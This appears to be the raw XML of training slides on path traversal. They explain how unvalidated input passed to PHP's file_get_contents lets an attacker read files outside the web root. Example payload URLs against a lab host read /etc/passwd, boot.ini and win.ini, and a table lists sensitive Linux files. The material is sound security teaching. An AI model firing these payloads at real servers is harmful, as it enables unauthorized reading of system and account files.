            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" u="sng" dirty="0"/>
              <a:t>﻿Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Traversal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Also known a s Directory traversal, web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>security vulnerability allows an attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>read operating system resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, such as local files on the server running an application. The attacker exploits this vulnerability by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>manipulating and abusing the web application's URL to locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>and access files or directories stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>outside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>application's root directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>Path traversal vulnerabilities occur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0"/>
              <a:t>when the user's input is passed to a function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file_get_contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t> in PHP. It's important to note that the function is not the main contributor to the vulnerability. Often poor input validation or filtering is the cause of the vulnerability. In PHP, you can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>file_get_contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t> to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>content of a file. You can find more information about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>More: https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" u="sng" dirty="0"/>
              <a:t>://www.php.net/manual/en/function.file-get-contents.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1775493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1800" dirty="0"/>
              <a:t>The following graph shows how a web application stores files in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/www/app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. The happy path would be the user requesting the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userCV.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> from a defined path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/www/app/CVs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29" y="952905"/>
            <a:ext cx="11851947" cy="5079405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3742748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marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>We can test out the URL parameter by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adding payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>to see how the web application behaves. Path traversal attacks, also known as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dot-dot-slash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> attack, take advantage of moving the directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>one step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>up using the double dots </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> If the attacker finds the entry point, which in this case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>get.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>=, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>then the attacker may send something as follows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://webapp.thm/get.php?file=../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>etc/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Suppose there isn't input validation, and instead of accessing the PDF files at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/www/app/CVs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>location, the web application retrieves files from other directories, which in this case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Each .. entry moves one directory until it reaches the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> Then it changes the directory to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, and from there, it read the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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4331" y="2095891"/>
            <a:ext cx="5574009" cy="4762108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2978310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GB" dirty="0"/>
              <a:t>Similarly, if the web application runs on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Windows server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, the attacker needs to provide Windows paths. For example, if the attacker wants to read the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>boot.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> file located in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c:\boot.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, then the attacker can try the following depending on the target OS version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://webapp.thm/get.php?file=../../../../boot.ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://webapp.thm/get.php?file=../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows/win.ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The same concept applies here as with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux operating systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, where we climb up directories until it reaches the root directory, which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usually c:\.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3975067894"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="204716" y="3029803"/>
          <a:ext cx="11887200" cy="3792713"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2593075"/>
                <a:gridCol w="9294125"/>
              </a:tblGrid>
              <a:tr h="607801">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/issue</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>contains a message or system identification to be printed before the login prompt.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="607801">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/profile</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>controls system-wide default variables, such as </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Export variables, File creation mask (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>umask</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>), Terminal types, Mail messages to indicate when new mail has arrived</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="381982">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>proc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/version</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>specifies the version of the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Linux</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> kernel</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="500206">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>passwd</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>has all registered user that has access to a system</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
